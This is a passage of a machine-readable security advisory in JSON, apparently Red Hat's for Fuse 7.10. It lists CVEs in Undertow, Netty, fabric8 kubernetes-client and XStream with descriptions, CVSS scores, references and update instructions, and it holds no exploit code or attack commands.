"UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "undertow: potential security issue in flow control over HTTP/2 may lead to DOS" }, { "cve": "CVE-2021-3690", "cwe": { "id": "CWE-401", "name": "Missing Release of Memory after Effective Lifetime" }, "discovery_date": "2021-08-06T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1991299" } ], "notes": [ { "category": "description", "text": "A flaw was found in Undertow. A buffer leak on the incoming WebSocket PONG message may lead to memory exhaustion. This flaw allows an attacker to cause a denial of service. The highest threat from this vulnerability is availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "undertow: buffer leak on incoming websocket PONG message may lead to DoS", "title": "Vulnerability summary" }, { "category": "other", "text": "Although Red Hat OpenStack Platform packages the vulnerable code in Opendaylight, it does not use or support the undertow-encapsulating features. 
The security impact for RHOSP is therefore rated as Low and no update will be provided at this time.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-3690" }, { "category": "external", "summary": "RHBZ#1991299", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1991299" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-3690", "url": "https://www.cve.org/CVERecord?id=CVE-2021-3690" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-3690", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3690" } ], "release_date": "2021-07-30T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ 
"Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "undertow: buffer leak on incoming websocket PONG message may lead to DoS" }, { "acknowledgments": [ { "names": [ "Ivan Bodrov" ] }, { "names": [ "Marc Nuri" ], "organization": "Red Hat", "summary": "This issue was discovered by Red Hat." } ], "cve": "CVE-2021-20218", "cwe": { "id": "CWE-22", "name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)" }, "discovery_date": "2021-02-01T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1923405" } ], "notes": [ { "category": "description", "text": "A flaw was found in the fabric8 kubernetes-client in version 4.2.0 and after. This flaw allows a malicious pod/container to cause applications using the fabric8 kubernetes-client `copy` command to extract files outside the working path. The highest threat from this vulnerability is to integrity and system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "fabric8-kubernetes-client: vulnerable to a path traversal leading to integrity and availability compromise", "title": "Vulnerability summary" }, { "category": "other", "text": "In OpenShift Container Platform 4 (OCP) there are no plans to maintain the ose-logging-elasticsearch5 container, therefore it has been marked wontfix at this time and maybe fixed in a future update.\n\nRed Hat CodeReady WorkSpaces 2.7.0 does not ship fabric8-kubernetes-client and is therefore not affected by this flaw.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": 
"https://access.redhat.com/security/cve/CVE-2021-20218" }, { "category": "external", "summary": "RHBZ#1923405", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1923405" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-20218", "url": "https://www.cve.org/CVERecord?id=CVE-2021-20218" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-20218", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-20218" }, { "category": "external", "summary": "https://github.com/fabric8io/kubernetes-client/issues/2715", "url": "https://github.com/fabric8io/kubernetes-client/issues/2715" } ], "release_date": "2021-01-12T04:35:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.4, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "fabric8-kubernetes-client: vulnerable to a path traversal leading to integrity and availability compromise" }, { "cve": "CVE-2021-21290", "cwe": { "id": "CWE-200", "name": "Exposure of Sensitive Information to an Unauthorized Actor" }, "discovery_date": 
"2021-02-09T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1927028" } ], "notes": [ { "category": "description", "text": "In Netty there is a vulnerability on Unix-like systems involving an insecure temp file. When netty\u0027s multipart decoders are used, a local information disclosure can occur via the local system temporary directory if temporary storing uploads on the disk is enabled. On unix-like systems, the temporary directory is shared between all user. As such, writing to this directory using APIs that do not explicitly set the file/directory permissions can lead to information disclosure.", "title": "Vulnerability description" }, { "category": "summary", "text": "netty: Information disclosure via the local system temporary directory", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-21290" }, { "category": "external", "summary": "RHBZ#1927028", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1927028" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-21290", "url": "https://www.cve.org/CVERecord?id=CVE-2021-21290" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-21290", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21290" } ], "release_date": "2021-02-09T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so 
on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "netty: Information disclosure via the local system temporary directory" }, { "cve": "CVE-2021-21295", "cwe": { "id": "CWE-444", "name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)" }, "discovery_date": "2021-03-09T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1937364" } ], "notes": [ { "category": "description", "text": "In Netty (io.netty:netty-codec-http2) before version 4.1.60.Final there is a vulnerability that enables request smuggling. If a Content-Length header is present in the original HTTP/2 request, the field is not validated by `Http2MultiplexHandler` as it is propagated up. This is fine as long as the request is not proxied through as HTTP/1.1. If the request comes in as an HTTP/2 stream, gets converted into the HTTP/1.1 domain objects (`HttpRequest`, `HttpContent`, etc.) 
via `Http2StreamFrameToHttpObjectCodec `and then sent up to the child channel\u0027s pipeline and proxied through a remote peer as HTTP/1.1 this may result in request smuggling.", "title": "Vulnerability description" }, { "category": "summary", "text": "netty: possible request smuggling in HTTP/2 due missing validation", "title": "Vulnerability summary" }, { "category": "other", "text": "Red Hat OpenStack Platform\u0027s OpenDaylight will not be updated for this flaw because it was deprecated as of OpenStack Platform 14 and is only receiving security fixes for Important and Critical flaws.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-21295" }, { "category": "external", "summary": "RHBZ#1937364", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1937364" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-21295", "url": "https://www.cve.org/CVERecord?id=CVE-2021-21295" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-21295", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21295" }, { "category": "external", "summary": "https://github.com/netty/netty/security/advisories/GHSA-wm47-8v5p-wjpj", "url": "https://github.com/netty/netty/security/advisories/GHSA-wm47-8v5p-wjpj" } ], "release_date": "2021-03-09T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so 
on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "netty: possible request smuggling in HTTP/2 due missing validation" }, { "cve": "CVE-2021-21341", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2021-03-23T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1942539" } ], "notes": [ { "category": "description", "text": "XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.16, there is vulnerability which may allow a remote attacker to allocate 100% CPU time on the target system depending on CPU type or parallel execution of such a payload resulting in a denial of service only by manipulating the processed input stream. No user is affected who followed the recommendation to setup XStream\u0027s security framework with a whitelist limited to the minimal required types. 
If you rely on XStream\u0027s default blacklist of the Security Framework, you will have to use at least version 1.4.16.", "title": "Vulnerability description" }, { "category": "summary", "text": "XStream: allow a remote attacker to cause DoS only by manipulating the processed input stream", "title": "Vulnerability summary" }, { "category": "other", "text": "OpenShift Container Platform (OCP) delivers Jenkins LTS package with bundled XStream library. Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, OCP Jenkins package is not affected by this flaw.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-21341" }, { "category": "external", "summary": "RHBZ#1942539", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1942539" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-21341", "url": "https://www.cve.org/CVERecord?id=CVE-2021-21341" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-21341", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21341" } ], "release_date": "2021-03-12T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 
product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "XStream: allow a remote attacker to cause DoS only by manipulating the processed input stream" }, { "cve": "CVE-2021-21342", "cwe": { "id": "CWE-918", "name": "Server-Side Request Forgery (SSRF)" }, "discovery_date": "2021-03-23T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1942545" } ], "notes": [ { "category": "description", "text": "XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.16, there is a vulnerability where the processed stream at unmarshalling time contains type information to recreate the formerly written objects. XStream creates therefore new instances based on these type information. An attacker can manipulate the processed input stream and replace or inject objects, that result in a server-side forgery request. No user is affected, who followed the recommendation to setup XStream\u0027s security framework with a whitelist limited to the minimal required types. 
If you rely on XStream\u0027s default blacklist of the Security Framework, you will have to use at least version 1.4.16.", "title": "Vulnerability description" }, { "category": "summary", "text": "XStream: SSRF via crafted input stream", "title": "Vulnerability summary" }, { "category": "other", "text": "OpenShift Container Platform (OCP) delivers Jenkins LTS package with bundled XStream library. Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, OCP Jenkins package is not affected by this flaw.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-21342" }, { "category": "external", "summary": "RHBZ#1942545", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1942545" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-21342", "url": "https://www.cve.org/CVERecord?id=CVE-2021-21342" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-21342", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21342" } ], "release_date": "2021-03-12T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation 
page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.4, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "XStream: SSRF via crafted input stream" }, { "cve": "CVE-2021-21343", "cwe": { "id": "CWE-552", "name": "Files or Directories Accessible to External Parties" }, "discovery_date": "2021-03-23T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1942550" } ], "notes": [ { "category": "description", "text": "XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.16, there is a vulnerability where the processed stream at unmarshalling time contains type information to recreate the formerly written objects. XStream creates therefore new instances based on these type information. An attacker can manipulate the processed input stream and replace or inject objects, that result in the deletion of a file on the local host. No user is affected, who followed the recommendation to setup XStream\u0027s security framework with a whitelist limited to the minimal required types. 
If you rely on XStream\u0027s default blacklist of the Security Framework, you will have to use at least version 1.4.16.", "title": "Vulnerability description" }, { "category": "summary", "text": "XStream: arbitrary file deletion on the local host via crafted input stream", "title": "Vulnerability summary" }, { "category": "other", "text": "OpenShift Container Platform (OCP) delivers Jenkins LTS package with bundled XStream library. Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, OCP Jenkins package is not affected by this flaw.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-21343" }, { "category": "external", "summary": "RHBZ#1942550", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1942550" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-21343", "url": "https://www.cve.org/CVERecord?id=CVE-2021-21343" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-21343", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21343" } ], "release_date": "2021-03-12T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation 
page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "XStream: arbitrary file deletion on the local host via crafted input stream" }, { "cve": "CVE-2021-21344", "cwe": { "id": "CWE-434", "name": "Unrestricted Upload of File with Dangerous Type" }, "discovery_date": "2021-03-23T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1942554" } ], "notes": [ { "category": "description", "text": "A flaw was found in xstream. A remote attacker may be able to load and execute arbitrary code from a remote host only by manipulating the processed input stream. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "XStream: Unsafe deserizaliation of javax.sql.rowset.BaseRowSet", "title": "Vulnerability summary" }, { "category": "other", "text": "OpenShift Container Platform (OCP) delivers Jenkins LTS package with bundled XStream library. 
Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, OCP Jenkins package is not affected by this flaw.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-21344" }, { "category": "external", "summary": "RHBZ#1942554", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1942554" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-21344", "url": "https://www.cve.org/CVERecord?id=CVE-2021-21344" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-21344", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21344" } ], "release_date": "2021-03-12T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": 
"NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "XStream: Unsafe deserizaliation of javax.sql.rowset.BaseRowSet" }, { "cve": "CVE-2021-21345", "cwe": { "id": "CWE-94", "name": "Improper Control of Generation of Code (\u0027Code Injection\u0027)" }, "discovery_date": "2021-03-23T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1942558" } ], "notes": [ { "category": "description", "text": "A flaw was found in xstream. A remote attacker, who has sufficient rights, can execute commands of the host by manipulating the processed input stream. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "XStream: Unsafe deserizaliation of com.sun.corba.se.impl.activation.ServerTableEntry", "title": "Vulnerability summary" }, { "category": "other", "text": "OpenShift Container Platform (OCP) delivers Jenkins LTS package with bundled XStream library. 
Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, OCP Jenkins package is not affected by this flaw.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-21345" }, { "category": "external", "summary": "RHBZ#1942558", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1942558" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-21345", "url": "https://www.cve.org/CVERecord?id=CVE-2021-21345" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-21345", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21345" } ], "release_date": "2021-03-12T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", 
"privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "XStream: Unsafe deserizaliation of com.sun.corba.se.impl.activation.ServerTableEntry" }, { "cve": "CVE-2021-21346", "cwe": { "id": "CWE-434", "name": "Unrestricted Upload of File with Dangerous Type" }, "discovery_date": "2021-03-23T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1942578" } ], "notes": [ { "category": "description", "text": "A flaw was found in xstream. A remote attacker can load and execute arbitrary code from a remote host by manipulating the processed input stream. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "XStream: Unsafe deserizaliation of sun.swing.SwingLazyValue", "title": "Vulnerability summary" }, { "category": "other", "text": "OpenShift Container Platform (OCP) delivers Jenkins LTS package with bundled XStream library. 
Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, OCP Jenkins package is not affected by this flaw.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-21346" }, { "category": "external", "summary": "RHBZ#1942578", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1942578" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-21346", "url": "https://www.cve.org/CVERecord?id=CVE-2021-21346" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-21346", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21346" } ], "release_date": "2021-03-12T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", 
"privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "XStream: Unsafe deserizaliation of sun.swing.SwingLazyValue" }, { "cve": "CVE-2021-21347", "cwe": { "id": "CWE-434", "name": "Unrestricted Upload of File with Dangerous Type" }, "discovery_date": "2021-03-23T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1942629" } ], "notes": [ { "category": "description", "text": "A flaw was found in xstream. A remote attacker may be able to load and execute arbitrary code from a remote host only by manipulating the processed input stream. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "XStream: Unsafe deserizaliation of com.sun.tools.javac.processing.JavacProcessingEnvironment NameProcessIterator", "title": "Vulnerability summary" }, { 